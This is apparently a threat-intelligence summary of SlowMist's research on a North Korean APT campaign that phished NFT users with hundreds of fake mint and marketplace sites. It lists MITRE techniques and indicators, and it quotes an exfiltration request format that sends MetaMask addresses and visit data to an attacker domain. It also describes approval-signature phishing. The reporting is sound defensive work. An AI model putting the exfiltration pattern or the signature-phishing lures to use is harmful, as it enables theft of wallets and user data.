Threat Research

SlowMist: Our In-Depth Investigation of North Korean APT’s Large-Scale Phishing Attack on NFT Users

Securonix

SlowMist analyzes a North Korean APT operation that carried out a large-scale phishing campaign targeting NFT users, exposing how hundreds of fake NFT domains and decoy mint sites were used to harvest wallet approvals and data. The findings tie this campaign to broader NK-linked phishing activity, detail attacker infrastructure, and describe specific techniques used to exfiltrate data and leverage user approvals. #NorthKoreanAPT #NFTPhishing #PhishingDomains #OpenSea #X2Y2 #Rarible #thedoodles.site #MistTrack #Seaport #Binance #NaverPhishing

Keypoints

  • SlowMist identified a North Korean APT conducting a large-scale phishing campaign aimed at NFT and crypto users, with multiple public mentions and confirmations from security researchers.
  • The operation used a broad infrastructure of phishing domains (about 196 named in one report) and was linked to a larger network of NFT phishing sites hosted across IPs, including 372 sites on one IP and 320 on another.
  • Attackers created fake NFT-related decoy websites and minted NFTs on platforms like OpenSea, X2Y2, and Rarible to lure victims with seemingly legitimate offers.
  • Key data collection techniques included exfiltrating visitor data via HTTP GET requests to an external domain, using /postAddr.php to record wallet addresses, visit times, and visited URLs.
  • Phishing sites employed decoy pricing data via getPriceData.php and used an imgSrc.js file to map images to target sites, indicating templated phishing site infrastructure.
  • Signature-based phishing was used to induce users to approve transactions (e.g., Seaport and ERC20 signatures), enabling unauthorized asset transfers.
  • MistTrack flagged a high-risk phishing address (0xC0fd…e0ca) with over 1,000 NFT transactions and ~300 ETH profit, demonstrating significant financial impact.

MITRE Techniques

  • [T1566] Phishing – The North Korean APT group targeted Crypto and NFT users with a phishing campaign using nearly 500 different domain names. – “The North Korean APT group targeted Crypto and NFT users with a phishing campaign using nearly 500 different domain names.”
  • [T1059.007] JavaScript – The phishing sites used a script file (imgSrc.js) linking images to the target project and listing hosting locations of image files used on their phishing sites. – “file imgSrc.js linking images to the target project , which contains a list of target sites and the hosting location of the image files used on their corresponding phishing sites.”
  • [T1204] User Execution – Attackers induced victims to perform signing actions, such as approving NFT and ERC20 transfers. – “The following code is used to induce victims to perform more common phishing ‘Approve’ operations, such as authorizing NFTs and ERC20 tokens.”
  • [T1583] Acquire Infrastructure – The campaign relied on infrastructure such as many domains and hosted sites; earliest domain registrations date back about 7 months. – “The earliest registration date was traced back to 7 months ago.”
  • [T1566] Phishing via Web Service/Decoy Websites – The operation used fake NFT-related decoy websites and phishing domains mimicking legitimate NFT platforms to harvest credentials and approvals. – “fake NFT-related decoy websites with malicious Mints” and “nearly 500 different domain names.”
  • [T1036] Masquerading – Phishing sites appeared to be NFT projects and marketplaces, deceiving users into interacting with counterfeit pages. – “fake NFT-related decoy websites” and later references to World Cup-themed site.
  • [T1041] Exfiltration Over C2 Channel – Visitor data and wallet information were sent to an external domain via HTTP GET requests (e.g., /postAddr.php). – “The hacker records visitors’ information to an external domain through an HTTP GET request. The general format is ‘https://nserva.live/postAddr.php?mmAddr=…[Metamask]…&accessTime=xxx&url=evil.site’.”

Indicators of Compromise

  • [Domain] Thedoodles.site – main domain used to monitor user requests; also associated with other NK phishing infrastructure
  • [Domain] Tothesky.in – observed C2 domain in the phishing infrastructure
  • [Domain] Commonj.xyz – observed C2 domain in the phishing infrastructure
  • [URL] Pastebin URL – https://pastebin.com/UV9pJN2M (phishing domain list)
  • [File] imgSrc.js – script file linking images to phishing templates
  • [File] getPriceData.php – endpoint used to fetch NFT price data in phishing sites
  • [URL] Seaport/Signature-related indicators – references to fake Seaport and approve-signature workflows to harvest approvals

Read more: https://slowmist.medium.com/slowmist-our-in-depth-investigation-of-north-korean-apts-large-scale-phishing-attack-on-nft-users-362117600519